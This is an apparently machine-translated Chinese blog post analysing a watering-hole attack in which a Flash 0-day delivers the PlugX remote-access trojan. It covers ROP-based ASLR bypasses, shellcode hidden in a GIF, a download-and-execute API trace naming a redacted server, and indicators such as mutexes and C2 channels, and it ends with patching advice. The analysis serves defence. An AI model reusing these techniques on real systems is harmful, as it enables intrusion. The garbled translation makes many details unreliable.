对于Adobe0day-使用CVE
核心提示:FireEye发布另一天AdobeFlash新0day攻击的报告,和Adobe已经发布了安全更新基于漏洞。根据FireEye的报告,很多网站会重定向访问者到下面的效果。几天前,FireEye的发表了使用一种新的AdobeFlash 0day攻击的报告,和Adobe已经发布了安全更新基于脆弱性。
根据FireEye的报告,很多网站会重定向访问者到恶意服务器包含以下开发:
彼得森国际经济研究所
埃及美国研究中心
理查德森基金会的恶意Flash文件位于 / 4.59。XXX,XX / / cc.swf
flash包含一些有趣的调试符号:
在C的Actionscript代码: users07 桌面 flashexp(IE) cc.asflash SRC文件是用来确定操作系统的版本选择硬编码的ROP链绕过ASLR。
如果是Windows XP系统,代码将首先检查系统语言,对于以下两种语言的系统,只包括ROP链。
英语
在这种情况下(Windows XP系统),ROP链使用一个众所周知的技术,从汇编Msvcrt.dll提取物。
如果系统运行Windows 7:
检查系统是否已经安装了java java 1.6或1.7。
如果安装了Java1.6语言,代码使用ROP链在MSVCR71.dll,带来了java 1.6,和DLL文件没有ASLR保护。
-检查系统是否安装了微软Office 2007或2010。
如果安装在微软Office 2007 / 2010的ROP链采用的是与自己的hxdl.dll,和DLL没有ASLR保护。
负载hxds.dll,你需要使用一个协议处理器,location.href = 'ms-help:',在这种类型的攻击是很常见的
Actionscript代码负责在同一时间下载一个GIF文件:
下载的文件,如下图所示,看起来像一个普通的图片。
但图片包含shellcode在抵消3344的shellcode下载并执行来自同一服务器的PE32文件。
图片执行shellcode的使用是一种聪明的做法,因为它可以绕过许多网络安全产品监测。
shellcode使用以下功能下载并执行PE32文件:
LoadLibraryA(程序)
LoadLibraryA(参数)
virtualprotect(ADR = 404bf1,SZ = 4,旗帜= 40)
(0)setunhandledexceptionfilter
virtualprotect(ADR = 7c81cdda,SZ = 82,旗帜= 40)
virtualprotect(ADR = 7c81cdda,SZ = 82,旗帜= 0)
setunhandledexceptionfilter(7c81cdda)
GetTempPath(len = 104,buf = 12fca4)= 14
GetTempFileName(路径= C:用户美国温度,前缀= 0,= 0 =独特,但12fca4)= 245d
路径= C:用户美国温度 245d.tmp
internetopena()
internetopenurla( / 4.59,XX,XX / /更新。exe)
CreateFileA(C:用户美国温度 245d。TMP)= 4
读取Internet文件(1、缓冲区:12fbe8,大小:64)
internetclosehandle(1)= 1
internetclosehandle(1)= 1
使用方法(4)用于在负载这种攻击是一个非常著名的远程控制程序的PlugX RAT,我以前的博客好几次:
追踪的PlugX RAT作者
中国和latestinternet团伙的PlugX探险家ZeroDay之间的连接
这个新版本会出现针对国防工业ZeroDay公司
一个恶意程序将自身复制到 AllUsers rastls.exe DRM rastls并创建以下的执行进程互斥:
basenamedobjects dklw全球
basenamedobjects全球CSO
basenamedobjects qemyqvmyhiy全球
basenamedobjects eriwjjo全球
basenamedobjects etniisebehheq全球
basenamedobjects beetxado全球
basenamedobjects zhyzrjduosfptunf全球
basenamedobjects zzusnnzeqgzupeto全球
basenamedobjects onwmkwazrynpn全球
basenamedobjects 全球MTG
basenamedobjects helbibkzhruo全球
basenamedobjects opylrvflplgad全球
basenamedobjects zgjawrojchcfavnh全球
basenamedobjects GMD全球
basenamedobjects svdwr全球
basenamedobjects unbdehrrxgqujyazj全球
basenamedobjects全球品质
basenamedobjects ihnwguwceofkhcv全球
basenamedobjects kvxieoc全球
basenamedobjects my_name_horse(Svchost)注入到Svchost进程在同一时间。
PlugX包含三种不同的命令和控制方式:
00903474 java { } { }名字NS1蛋白。
009034b8 -> adservice { { }。{没有IP网站。
009034fc -> WMI { } { }。01。我们通过HTTP和CC相互作用:
注意,下面的图中指定的cc域名是恶意软件:
在这一点上,不提醒你,你将更新Adobe和java和Office版本,可以被用来绕过ASLR尽快。
玩得愉快!